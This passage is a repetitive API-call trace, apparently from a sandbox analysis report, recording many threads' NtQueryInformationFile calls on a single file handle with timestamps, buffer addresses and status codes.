FileInformationClass=0x9 | out: IoStatusBlock=0x359f798, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 626 os_tid = 0xb18 [0161.938] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff928, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff928, FileInformation=0x208e20) returned 0x0 Thread: id = 627 os_tid = 0xa68 [0161.940] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdf0, FileInformation=0x208e20) returned 0x0 Thread: id = 628 os_tid = 0x224 [0161.942] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f9e0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f9e0, FileInformation=0x208e20) returned 0x0 Thread: id = 629 os_tid = 0x2c4 [0161.945] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9a8, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 630 os_tid = 0x24c [0161.946] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff40, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 631 os_tid = 0x4e8 [0161.948] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7b8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7b8, FileInformation=0x208e20) returned 0x0 Thread: id = 632 os_tid = 0x220 [0161.950] NtQueryInformationFile (FileHandle=0x194, IoStatusBlock=0x365fac0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9) Thread: id = 633 os_tid = 0xb04 [0162.205] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc20, FileInformation=0x208e20) returned 0x0 Thread: id = 634 os_tid = 0x180 [0162.208] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f998, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f998, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 635 os_tid = 0x53c [0162.209] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb20, FileInformation=0x208e20) returned 0x0 Thread: id = 636 os_tid = 0x5b4 [0162.211] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fea8, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 637 os_tid = 0x614 [0162.213] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa30, FileInformation=0x208e20) returned 0x0 Thread: id = 638 os_tid = 0x690 [0162.215] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fba0, FileInformation=0x208e20) returned 0x0 Thread: id = 639 os_tid = 0x440 [0162.219] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f8d0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f8d0, FileInformation=0x208e20) returned 0x0 Thread: id = 640 os_tid = 0x7d8 [0162.224] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7a0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7a0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 641 os_tid = 0xa60 [0162.230] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe78, FileInformation=0x208e20) returned 0x0 Thread: id = 642 os_tid = 0xb24 [0162.234] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc88, FileInformation=0x208e20) returned 0x0 Thread: id = 643 os_tid = 0x878 [0162.237] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe10, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 644 os_tid = 0xb1c [0162.240] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fac8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fac8, FileInformation=0x208e20) returned 0x0 Thread: id = 645 os_tid = 0xb08 [0162.242] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9a0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9a0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 646 os_tid = 0x4fc [0162.262] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36fff00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36fff00, FileInformation=0x210e20) returned 0x0 Thread: id = 647 os_tid = 0x4dc [0162.264] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f948, FileInformation=0x210e20) returned 0xc000000d Thread: id = 648 os_tid = 0x43c [0162.266] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb30, FileInformation=0x210e20) returned 0xc000000d Thread: id = 649 os_tid = 0x1c4 [0162.268] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff948, FileInformation=0x210e20) returned 0xc000000d Thread: id = 650 os_tid = 0xbec [0162.270] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fac8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 651 os_tid = 0xb48 [0162.272] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfad0, FileInformation=0x210e20) returned 0xc000000d Thread: id = 652 os_tid = 0x5bc [0162.274] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f910, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f910, FileInformation=0x210e20) returned 0xc000000d Thread: id = 653 os_tid = 0x6b8 [0162.276] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f798, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f798, FileInformation=0x210e20) returned 0xc000000d Thread: id = 654 os_tid = 0x2dc [0162.278] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7c8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 655 os_tid = 0x158 [0162.280] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcd8, FileInformation=0x210e20) returned 0x0 Thread: id = 656 os_tid = 0x6cc [0162.282] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff18, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 657 os_tid = 0x694 [0162.284] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfdb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfdb0, FileInformation=0x210e20) returned 0x0 Thread: id = 658 os_tid = 0x6d8 [0162.286] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df920, FileInformation=0x210e20) returned 0x0 Thread: id = 659 os_tid = 0x87c [0162.288] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe28, FileInformation=0x210e20) returned 0x0 Thread: id = 660 os_tid = 0xb88 [0162.290] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7b0, FileInformation=0x210e20) returned 0x0 Thread: id = 661 os_tid = 0xb8c [0162.291] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa80, FileInformation=0x210e20) returned 0x0 Thread: id = 662 os_tid = 0x700 [0162.293] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f9f8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 663 os_tid = 0x6f0 [0162.295] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f808, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 664 os_tid = 0x130 [0162.300] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc40, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 665 os_tid = 0x754 [0162.302] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 666 os_tid = 0x72c [0162.304] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f858, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 667 os_tid = 0x748 [0162.306] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfaa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfaa0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 668 os_tid = 0x928 [0162.308] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 669 os_tid = 0xcc [0162.310] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fdc0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 670 os_tid = 0xd0 [0162.312] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fdf8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 671 os_tid = 0xd4 [0162.314] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb20, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 672 os_tid = 0xd8 [0162.316] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcd0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 673 os_tid = 0xdc [0162.318] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa80, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 674 os_tid = 0xe0 [0162.320] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f9b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f9b8, FileInformation=0x210e20) returned 0x0 Thread: id = 675 os_tid = 0xe4 [0162.322] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa58, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 676 os_tid = 0xe8 [0162.324] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfee8, FileInformation=0x210e20) returned 0x0 Thread: id = 677 os_tid = 0xec [0162.329] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f848, FileInformation=0x210e20) returned 0x0 Thread: id = 678 os_tid = 0x9d8 [0162.333] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 679 os_tid = 0x898 [0162.335] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff990, FileInformation=0x210e20) returned 0x0 Thread: id = 680 os_tid = 0x48c [0162.337] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7f8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 681 os_tid = 0x6a4 [0162.338] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 682 os_tid = 0x20c [0162.340] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f810, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f810, FileInformation=0x210e20) returned 0x0 Thread: id = 683 os_tid = 0x704 [0162.342] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f910, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f910, FileInformation=0x210e20) returned 0x0 Thread: id = 684 os_tid = 0x568 [0162.346] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd90, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 685 os_tid = 0x5ac [0162.349] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 686 os_tid = 0x908 [0162.353] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff08, FileInformation=0x210e20) returned 0x0 Thread: id = 687 os_tid = 0x888 [0162.355] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff78, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 688 os_tid = 0x544 [0162.357] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd18, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 689 os_tid = 0x76c [0162.359] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f878, FileInformation=0x210e20) returned 0x0 Thread: id = 690 os_tid = 0xa9c [0162.361] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8a8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 691 os_tid = 0x114 [0162.363] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffb50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffb50, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 692 os_tid = 0x5b8 [0162.364] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc08, FileInformation=0x210e20) returned 0x0 Thread: id = 693 os_tid = 0x814 [0162.366] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f850, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 694 os_tid = 0x834 [0162.368] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc30, FileInformation=0x210e20) returned 0x0 Thread: id = 695 os_tid = 0x884 [0162.370] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9e8, FileInformation=0x210e20) returned 0x0 Thread: id = 696 os_tid = 0x5d4 [0162.372] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe28, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 697 os_tid = 0x340 [0162.375] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8d0, FileInformation=0x210e20) returned 0x0 Thread: id = 698 os_tid = 0x810 [0162.377] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 699 os_tid = 0x830 [0162.379] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9e8, FileInformation=0x210e20) returned 0x0 Thread: id = 700 os_tid = 0x880 [0162.380] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe68, FileInformation=0x210e20) returned 0x0 Thread: id = 701 os_tid = 0xae4 [0162.382] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f808, FileInformation=0x210e20) returned 0x0 Thread: id = 702 os_tid = 0x570 [0162.384] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fb88, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 703 os_tid = 0xb40 [0162.386] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd80, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 704 os_tid = 0x5f4 [0162.387] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd00, FileInformation=0x210e20) returned 0x0 Thread: id = 705 os_tid = 0xbb8 [0162.393] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd18, FileInformation=0x210e20) returned 0x0 Thread: id = 706 os_tid = 0x598 [0162.395] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 707 os_tid = 0x4e4 [0162.397] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fac8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 708 os_tid = 0xbfc [0162.399] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd48, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 709 os_tid = 0x80c [0162.400] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fbd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fbd0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 710 os_tid = 0xbf8 [0162.402] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe50, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 711 os_tid = 0x524 [0162.404] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe90, FileInformation=0x210e20) returned 0x0 Thread: id = 712 os_tid = 0x674 [0162.406] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fee0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fee0, FileInformation=0x210e20) returned 0x0 Thread: id = 713 os_tid = 0x4a0 [0162.408] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd48, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 714 os_tid = 0x5d8 [0162.410] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 715 os_tid = 0x69c [0162.416] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 716 os_tid = 0x6a8 [0162.419] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fc58, FileInformation=0x210e20) returned 0x0 Thread: id = 717 os_tid = 0x500 [0162.420] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fad0, FileInformation=0x210e20) returned 0x0 Thread: id = 718 os_tid = 0x4e0 [0162.422] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf870, FileInformation=0x210e20) returned 0x0 Thread: id = 719 os_tid = 0x330 [0162.424] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8d8, FileInformation=0x210e20) returned 0x0 Thread: id = 720 os_tid = 0xa30 [0162.426] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9b0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 721 os_tid = 0xb50 [0162.428] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbf0, FileInformation=0x210e20) returned 0x0 Thread: id = 722 os_tid = 0xb70 [0162.430] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f840, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f840, FileInformation=0x210e20) returned 0x0 Thread: id = 723 os_tid = 0xb6c [0162.432] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 724 os_tid = 0xb74 [0162.434] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f808, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 725 os_tid = 0xb68 [0162.436] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 726 os_tid = 0x758 [0162.438] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd38, FileInformation=0x210e20) returned 0x0 Thread: id = 727 os_tid = 0x3d4 [0162.440] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9e8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 728 os_tid = 0x484 [0162.442] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd90, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 729 os_tid = 0xb4c [0162.444] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fec0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fec0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 730 os_tid = 0xa1c [0162.445] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfba8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 731 os_tid = 0x2ac [0162.447] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff28, FileInformation=0x210e20) returned 0x0 Thread: id = 732 os_tid = 0xa8c [0162.449] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f9d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f9d8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 733 os_tid = 0x68c [0162.450] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f7d0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 734 os_tid = 0x388 [0162.452] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7f8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 735 os_tid = 0xa50 [0162.454] NtQueryInformationFile (in: FileHandle=0x194, 